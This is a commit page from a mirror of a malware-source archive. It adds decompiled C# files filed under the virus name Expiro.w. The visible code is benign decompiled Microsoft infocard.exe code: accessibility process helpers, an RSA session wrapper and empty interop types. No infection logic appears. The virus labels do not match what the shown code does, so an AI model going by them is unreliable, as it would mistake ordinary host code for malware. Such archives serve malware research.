daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/AssemblyInfo.cs
+22
View File
@@ -0,0 +1,22 @@
using System;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Permissions;
[assembly: SatelliteContractVersion("3.0.0.0")]
[assembly: AssemblyFileVersion("3.0.4506.2152")]
[assembly: AssemblyCopyright("© Microsoft Corporation. All rights reserved.")]
[assembly: NeutralResourcesLanguage("en-US")]
[assembly: AssemblyInformationalVersion("3.0.4506.2152")]
[assembly: ComVisible(false)]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyDefaultAlias("infocard.exe")]
[assembly: AssemblyDescription("infocard.exe")]
[assembly: AssemblyTitle("infocard.exe")]
[assembly: CLSCompliant(false)]
[assembly: AssemblyProduct("Microsoft® .NET Framework")]
[assembly: AssemblyKeyFile("f:\\dd\\Tools\\devdiv\\EcmaPublicKey.snk")]
[assembly: AssemblyDelaySign(true)]
[assembly: AssemblyVersion("3.0.0.0")]
[assembly: SecurityPermission(SecurityAction.RequestMinimum, SkipVerification = true)]
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/BrowserNavConstants.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: BrowserNavConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum BrowserNavConstants
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/CallMode.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CallMode
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CallMode
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/CommandStateChangeConstants.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: CommandStateChangeConstants
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[NativeCppClass]
[DebugInfoInPDB]
internal enum CommandStateChangeConstants
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HDC__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HDC__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[NativeCppClass]
[DebugInfoInPDB]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HDC__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HINSTANCE__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HINSTANCE__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HINSTANCE__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HWND__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HWND__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[DebugInfoInPDB]
[NativeCppClass]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HWND__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IGNOREMIME.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IGNOREMIME
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum IGNOREMIME
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMAGE_AUX_SYMBOL_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMAGE_AUX_SYMBOL_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMAGE_AUX_SYMBOL_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMPORT_OBJECT_NAME_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_NAME_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMPORT_OBJECT_NAME_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMPORT_OBJECT_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(64)]
internal enum IMPORT_OBJECT_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityApplicationManager.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityApplicationManager
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityApplicationManager
{
private const int WindowsVistaMajorVersion = 6;
private IAccessibilityHelper m_helper;
public AccessibilityApplicationManager()
{
bool fTabletPC = 0 != NativeMethods.GetSystemMetrics(86);
if (Environment.OSVersion.Version.Major < 6)
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForXpWin2k3(fTabletPC);
else
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForVista(fTabletPC);
}
public void Stop() => this.m_helper.Stop();
public void RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
this.m_helper.RestartOnInfoCardDesktop(userATApplicationFlags, hTrustedUserToken, ref trustedUserSid, infocardDesktop, userSessionId, userProcessId, userIdentity);
}
public bool RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
return this.m_helper.RestartOnUsersDesktop(userProcessId, userDesktop, userIdentity);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityHelperForVista.cs
+124
View File
@@ -0,0 +1,124 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForVista
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForVista : IAccessibilityHelper, IDisposable
{
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string progfilePath = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles);
private static readonly string baseATPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs";
private static readonly string configPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session";
private List<string> m_applicationList = new List<string>();
private ProcessManager m_manager;
private bool m_fResetConfigKey;
private int m_sessionId;
private bool m_fTabletPC;
public AccessibilityHelperForVista(bool fTabletPC)
{
this.m_fTabletPC = fTabletPC;
this.InitializeATAppData();
}
private void InitializeATAppData()
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.baseATPath);
foreach (string subKeyName in registryKey.GetSubKeyNames())
{
string str = (string) registryKey.OpenSubKey(subKeyName).GetValue("ATExe");
if (!string.IsNullOrEmpty(str))
this.m_applicationList.Add(str);
}
}
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
if (!this.m_fResetConfigKey)
return false;
Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.configPath + (object) this.m_sessionId, true).SetValue("Configuration", (object) "");
this.m_fResetConfigKey = false;
return true;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_fResetConfigKey = false;
this.m_sessionId = userSessionId;
string str = userIdentity.User.Value;
for (int index = 0; index < this.m_applicationList.Count; ++index)
{
string application = this.m_applicationList[index];
Process[] processesByName = Process.GetProcessesByName(application.Substring(0, application.LastIndexOf('.')));
if (processesByName != null)
{
foreach (Process p in processesByName)
{
if (userSessionId == p.SessionId)
{
this.m_fResetConfigKey = true;
if (!Utility.KillHelper(p))
break;
break;
}
}
}
}
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
string fullPath1 = Path.Combine(AccessibilityHelperForVista.systemPath, "AtBroker.exe");
if (userATApplicationFlags != 0U)
{
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath1, "", fUseElevatedToken);
}
if (!this.m_fTabletPC)
return;
string fullPath2 = Path.Combine(AccessibilityHelperForVista.progfilePath, "microsoft shared\\ink\\tabtip.exe");
bool fUseElevatedToken1 = true;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath2, "/SeekDesktop:", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityHelperForXpWin2k3.cs
+169
View File
@@ -0,0 +1,169 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForXpWin2k3
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForXpWin2k3 : IAccessibilityHelper, IDisposable
{
private const int OSKIndex = 0;
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string baseRegistryPath = "\\SOFTWARE\\Microsoft\\Utility Manager\\";
private static readonly string keyName = "Start on locked desktop";
internal static AccessibilityHelperForXpWin2k3.DownlevelAtData[] atApplications = new AccessibilityHelperForXpWin2k3.DownlevelAtData[3]
{
new AccessibilityHelperForXpWin2k3.DownlevelAtData("On-Screen Keyboard", "osk.exe", "msswchx"),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Magnifier", "magnify.exe", (string) null),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Narrator", "narrator.exe", (string) null)
};
private List<int> m_restartList = new List<int>();
private ProcessManager m_manager;
private bool m_fTabletPC;
public AccessibilityHelperForXpWin2k3(bool fTabletPC) => this.m_fTabletPC = fTabletPC;
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
using (new SystemIdentity(false))
{
foreach (int restart in this.m_restartList)
{
string application = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[restart].Image);
int pid = 0;
int userHelperWrapper = (int) NativeMcppMethods.CreateProcessAsUserHelperWrapper(application, "", userProcessId, userDesktop, userIdentity.Name, ref pid);
}
}
this.m_restartList.Clear();
return false;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint ATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_restartList.Clear();
bool flag1 = false;
string str = userIdentity.User.Value;
for (int index = 0; index < AccessibilityHelperForXpWin2k3.atApplications.Length; ++index)
{
using (RegistryKey registryKey = Registry.Users.OpenSubKey(str + AccessibilityHelperForXpWin2k3.baseRegistryPath + AccessibilityHelperForXpWin2k3.atApplications[index].RegistryPath))
{
bool flag2 = false;
int? nullable1 = new int?();
if (registryKey != null && RegistryValueKind.DWord == registryKey.GetValueKind(AccessibilityHelperForXpWin2k3.keyName))
nullable1 = new int?((int) registryKey.GetValue(AccessibilityHelperForXpWin2k3.keyName));
if (nullable1.HasValue)
{
int? nullable2 = nullable1;
if ((1 != nullable2.GetValueOrDefault() ? 0 : (nullable2.HasValue ? 1 : 0)) != 0)
goto label_9;
}
if (this.m_fTabletPC)
{
if (index != 0)
continue;
}
else
continue;
label_9:
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].Image.Substring(0, AccessibilityHelperForXpWin2k3.atApplications[index].Image.LastIndexOf('.'))))
{
flag2 = false;
if (userSessionId == p.SessionId)
{
flag2 = true;
this.m_restartList.Add(index);
if (!Utility.KillHelper(p))
break;
break;
}
}
if (flag2 && AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage != null)
{
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage))
{
if (userSessionId == p.SessionId && Utility.KillHelper(p))
break;
}
}
if (nullable1.HasValue)
{
int? nullable3 = nullable1;
if ((1 != nullable3.GetValueOrDefault() ? 0 : (nullable3.HasValue ? 1 : 0)) != 0)
{
if (ATApplicationFlags != 0U)
{
string fullPath = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[index].Image);
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath, "", fUseElevatedToken);
if (index == 0)
flag1 = true;
}
}
}
}
}
if (!this.m_fTabletPC || flag1)
return;
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken1 = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[0].Image), "", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
internal struct DownlevelAtData
{
public string RegistryPath;
public string Image;
public string AdditionalImage;
public DownlevelAtData(string path, string image, string additional)
{
this.RegistryPath = path;
this.Image = image;
this.AdditionalImage = additional;
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AppliesToBehaviorDecision.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecision
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal enum AppliesToBehaviorDecision : byte
{
DoNotSend,
SendRPAppliesTo,
SendCustomAppliesTo,
FailMatch,
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AppliesToBehaviorDecisionTable.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecisionTable
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.ServiceModel;
namespace Microsoft.InfoCards
{
internal static class AppliesToBehaviorDecisionTable
{
private static AppliesToBehaviorDecision[,] appliesToDecisionTable = new AppliesToBehaviorDecision[2, 3];
static AppliesToBehaviorDecisionTable()
{
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 0] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 0] = AppliesToBehaviorDecision.FailMatch;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 1] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 1] = AppliesToBehaviorDecision.SendRPAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 2] = AppliesToBehaviorDecision.SendCustomAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 2] = AppliesToBehaviorDecision.SendRPAppliesTo;
}
private static AppliesToBehaviorDecision GetAppliesToBehaviorDecision(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo,
bool considerUnrecognizedElements)
{
int index = (EndpointAddress) null == policy.PolicyAppliesTo ? 0 : 1;
if (considerUnrecognizedElements)
index = policy.NonWhiteListElementsFound ? 1 : index;
return AppliesToBehaviorDecisionTable.appliesToDecisionTable[index, (int) requireAppliesTo];
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForRst(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, false);
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForPolicyMatch(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, true);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/Asn1Utilities.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.Asn1Utilities
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal class Asn1Utilities
{
private Asn1Utilities()
{
}
public static string ToHexDump(byte[] bytes) => "";
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AsymmetricCryptoSession.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsymmetricCryptoSession
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AsymmetricCryptoSession : CryptoSession
{
private RSACryptoServiceProvider m_provider;
public AsymmetricCryptoSession(
Process process,
DateTime expirationTime,
WindowsIdentity identity,
RSACryptoServiceProvider key)
: base(process, expirationTime, identity, (object) key, CryptoSession.SessionType.Asymmetric)
{
this.m_provider = key;
}
protected override void OnWrite(BinaryWriter bwriter)
{
bwriter.Write(this.m_provider.KeySize);
Utility.SerializeString(bwriter, this.m_provider.KeyExchangeAlgorithm);
Utility.SerializeString(bwriter, this.m_provider.SignatureAlgorithm);
}
protected override void OnDispose()
{
this.m_provider.Clear();
this.m_provider.Dispose();
this.m_provider = (RSACryptoServiceProvider) null;
}
public byte[] Encrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Encrypt(inData, fOAEP);
}
public byte[] Decrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Decrypt(inData, fOAEP);
}
public byte[] SignHash(byte[] hash, string hashAlgOid)
{
this.ThrowIfDisposed();
return this.m_provider.SignHash(hash, hashAlgOid);
}
public bool VerifyHash(byte[] hash, string hashAlgOid, byte[] sig)
{
this.ThrowIfDisposed();
return this.m_provider.VerifyHash(hash, hashAlgOid, sig);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AsyncParams.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsyncParams
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.Win32.SafeHandles;
namespace Microsoft.InfoCards
{
internal abstract class AsyncParams
{
private RpcAsyncResult m_asyncResult;
protected AsyncParams(ClientRequest request, string opType, SafeWaitHandle externEvent) => this.m_asyncResult = new RpcAsyncResult(request, opType, externEvent);
public RpcAsyncResult AsyncResult => this.m_asyncResult;
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AuditLog.cs
+25
